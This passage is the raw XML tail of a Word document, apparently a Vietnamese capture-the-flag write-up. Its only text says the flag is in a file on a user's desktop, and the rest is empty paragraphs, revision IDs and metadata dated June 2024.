        <w:t>Chúng ta có thể tìm flag trong C:\Users\mike\Desktop\flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2258CC" w14:textId="6235CDDB" w:rsidR="000E26A3" w:rsidRDefault="000E26A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E7FDBC6" w14:textId="77777777" w:rsidR="00270C12" w:rsidRDefault="00270C12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A11D667" w14:textId="77777777" w:rsidR="00406C60" w:rsidRPr="00406C60" w:rsidRDefault="00406C60">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E2ECE57" w14:textId="04AEA8BD" w:rsidR="00FF2DA8" w:rsidRDefault="00FF2DA8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B8C18ED" w14:textId="77777777" w:rsidR="00FF2DA8" w:rsidRPr="004B3F9D" w:rsidRDefault="00FF2DA8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00FF2DA8" w:rsidRPr="004B3F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9293203"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B9EC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1C6D1B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E9B4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80"/>
    <w:rsid w:val="000C1480"/>
    <w:rsid w:val="000E26A3"/>
    <w:rsid w:val="001272F7"/>
    <w:rsid w:val="00270C12"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="003B1F60"/>
    <w:rsid w:val="003D1EBE"/>
    <w:rsid w:val="00406C60"/>
    <w:rsid w:val="004569DA"/>
    <w:rsid w:val="00463B08"/>
    <w:rsid w:val="004902B1"/>
    <w:rsid w:val="004B296A"/>
    <w:rsid w:val="004B3F9D"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="007E4D6D"/>
    <w:rsid w:val="008172F9"/>
    <w:rsid w:val="00BA6FB4"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00BD41E8"/>
    <w:rsid w:val="00C93ADB"/>
    <w:rsid w:val="00D154C4"/>
    <w:rsid w:val="00E65C3C"/>
    <w:rsid w:val="00F36138"/>
    <w:rsid w:val="00FE6B6C"/>
    <w:rsid w:val="00FF2DA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75BF073"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1D69CCC0-A61E-D24B-863A-0DE3B30D2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4B29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777</Words>
  <Characters>4434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2024-06-18T10:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-20T03:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>